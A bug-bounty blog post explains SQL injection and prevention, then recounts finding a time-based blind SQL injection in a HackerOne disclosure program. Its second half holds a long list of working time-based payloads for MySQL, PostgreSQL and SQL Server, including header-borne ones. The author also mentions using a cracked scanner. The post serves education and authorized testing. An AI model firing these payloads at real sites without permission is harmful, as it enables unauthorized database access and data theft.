Cyberhelper
Hello everyone, Welcome back to another blog of Cyberhelper with the hottest topic of SQL injections: How to Find Time-Based SQL injection vulnerability on a website.
Let me explain SQL Injection and how you can find it using manual and Automated tools.
What is SQL Injection?
SQL Injection (SQLi) is a security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It occurs when untrusted user input is incorrectly handled and directly embedded into SQL queries, allowing the attacker to modify the structure or logic of those queries.
How It Works:
A web application might use input from a user to build a SQL query. If this input is not properly sanitized or parameterized, an attacker can insert malicious SQL code that changes the intended behavior of the query.
Example (Vulnerable Code):
SQL
SELECT * FROM users WHERE username = ‘admin’ AND password = ‘password’;
If this query is built by directly inserting user input:
query = “SELECT * FROM users WHERE username = ‘” + username + “‘ AND password = ‘” + password + “‘”
An attacker could input:
- username: admin’ —
- password: anything
Resulting query:
SQL
SELECT * FROM users WHERE username = ‘admin’ –‘ AND password = ‘anything’;
The — starts a comment in SQL, so the rest is ignored, and the attacker is logged in as ‘admin’ without knowing the password.
Risks of SQL Injection:
- Authentication bypass
- Data theft (credit cards, personal info, etc.)
- Data manipulation (INSERT, UPDATE, DELETE)
- Database destruction
- Remote code execution (in some cases)
- Persistent control over the server
How to Prevent SQL Injection:
- Use Prepared Statements (Parameterized Queries)
- Ensures user input is treated as data, not executable code.
- Cursor.execute(“SELECT * FROM users WHERE username = %s AND password = %s”, (username, password))
- Use ORM libraries (like SQLAlchemy, and Hibernate) that abstract SQL queries.
- Input Validation and Escaping
- Ensure inputs conform to expected formats (e.g., emails, numbers).
- Least Privilege Principle
- The app should have limited permissions for the database user used.
- Web Application Firewalls (WAF)
- Detect and block SQLi patterns.
Summary:
SQL Injection is a critical vulnerability that can allow attackers to manipulate or access your database. Prevent it by using safe coding practices and parameterized queries.
How I find SQL Time Based.
So I got a Private Invitation to HackerOne in which I have only domain to test for security vulnerability and that program was not paid like it was VDP So in VDP program researchers did not get any paid or monetary reward for finding.
First thing i use manual technic to find SQL injections on parameters but from and how i get parameters. For finding parameters i use the Arjun tool (https://github.com/s0md3v/Arjun) This tool gave me 100% working parameters. After testing all parameters I didn’t get anything.
so just ignore sql injection and move forward for finding more vulnerability. after some time and finding all juicy bugs like Open-Rediretion And HTML Injection i report them and got some points.
Here story is not over The main point comes here. I started the automated finding using the tool named Acunetix (Cracked Version).
I just save the full url and start scan after few hours of scanning i got an high alert about vulnerability. After checking the alert for sql inejction it was the time based sql inejction.
What is Time-Based SQL?
Time-based SQL Injection is a type of Blind SQL Injection attack where the attacker determines whether a vulnerability exists and extracts information by measuring how long the database takes to respond to specially crafted queries.
What is “Blind” SQL Injection?
In a Blind SQL Injection, the application does not return error messages or data directly to the attacker. So instead of seeing the results, the attacker has to infer them indirectly, often by observing:
- The page’s response time
- The page’s content
- The HTTP status code
I have a preload Payloads of Time based SQL injections:
1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND ‘%’=’
1’XOR(if(now()=sysdate(),sleep(5),0))OR’
0
1 or sleep(5)#
0’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z
(select(0)from(select(sleep(5)))v)
email=test@gmail.com’ WAITFOR DELAY ‘0:0:5’–
email=test@gmail.com’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z
0’XOR(if(now()=sysdate(),sleep(5),0))XOR’Z
0’XOR(if(now()=sysdate(),sleep(5*1),0))XOR’Z
if(now()=sysdate(),sleep(5),0)
‘XOR(if(now()=sysdate(),sleep(5),0))XOR’
‘XOR(if(now()=sysdate(),sleep(5*1),0))OR’
0’|(IF((now())LIKE(sysdate()),SLEEP(1),0))|’Z
0’or(now()=sysdate()&&SLEEP(1))or’Z
if(now()=sysdate(),sleep(5),0)/”XOR(if(now()=sysdate(),sleep(5),0))OR”/
if(now()=sysdate(),sleep(5),0)/*’XOR(if(now()=sysdate(),sleep(5),0))OR'”XOR(if(now()=sysdate(),sleep(5),0))OR”*/
if(now()=sysdate(),sleep(5),0)/’XOR(if(now()=sysdate(),sleep(5),0))OR'”XOR(if(now()=sysdate(),sleep(5),0) and 5=5)”/
if(1=1,sleep(5),0)/*’XOR(if(1=1,sleep(5),0))OR'”XOR(if(1=1,sleep(5),0))OR”*/
if(1337=1337,exp(~(1)),0)/*’XOR(if(1337=1337,exp(~(1)),0))OR'”XOR(if(1337=1337,sleep(5),0))OR”*/
SLEEP(5)/*’ or SLEEP(5) or ‘” or SLEEP(5) or “*/
%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
‘%2b(select*from(select(sleep(5)))a)%2b’
(select*from(select(sleep(5)))a)
1’%2b(select*from(select(sleep(5)))a)%2b’
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)–
‘+(select*from(select(sleep(5)))a)+’
(select(0)from(select(sleep(5)))v)%2f’+(select(0)from(select(sleep(5)))v)+'”
(select(0)from(select(sleep(5)))v)%2f*’+(select(0)from(select(sleep(5)))v)+'”+(select(0)from(select(sleep(5)))v)+”*%2f
(select(0)from(select(sleep(5)))v)/*’+(select(0)from(select(sleep(5)))v)+'”+(select(0)from(select(sleep(5)))v)+”*/
‘,”),/*test*/%26%26%09sLeEp(5)%09–
‘%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END–
pg_SLEEP(5)
pg_SLEEP(5)–
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)–
or pg_SLEEP(5)#
pg_sleep(5)–
1 or pg_sleep(5)–
” or pg_sleep(5)–
‘ or pg_sleep(5)–
1) or pg_sleep(5)–
“) or pg_sleep(5)–
‘) or pg_sleep(5)–
1)) or pg_sleep(5)–
“)) or pg_sleep(5)–
‘)) or pg_sleep(5)–
;waitfor delay ‘0:0:5’–
);waitfor delay ‘0:0:5’–
‘;waitfor delay ‘0:0:5’–
“;waitfor delay ‘0:0:5’–
‘);waitfor delay ‘0:0:5’–
“);waitfor delay ‘0:0:5’–
));waitfor delay ‘0:0:5’–
‘));waitfor delay ‘0:0:5’–
“));waitfor delay ‘0:0:5’–
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
‘;WAITFOR DELAY ‘0:0:30’–
Accept: “‘ or sleep(30)=”
Accept-Charset: “‘or sleep(6)='”
These are some Time Based Payloads.
Acuntix gave me Time Based with 100% confirmality i pick the url and start testing on Burpsuite for trusting and guess what i got confirm SQL Time based. I report them and with in few hours of reporting they reply with Triage and solve the bug in 2 days got an hall of fame.
Some time Tools also can help you to find good stuffs.
Thanks for reading.
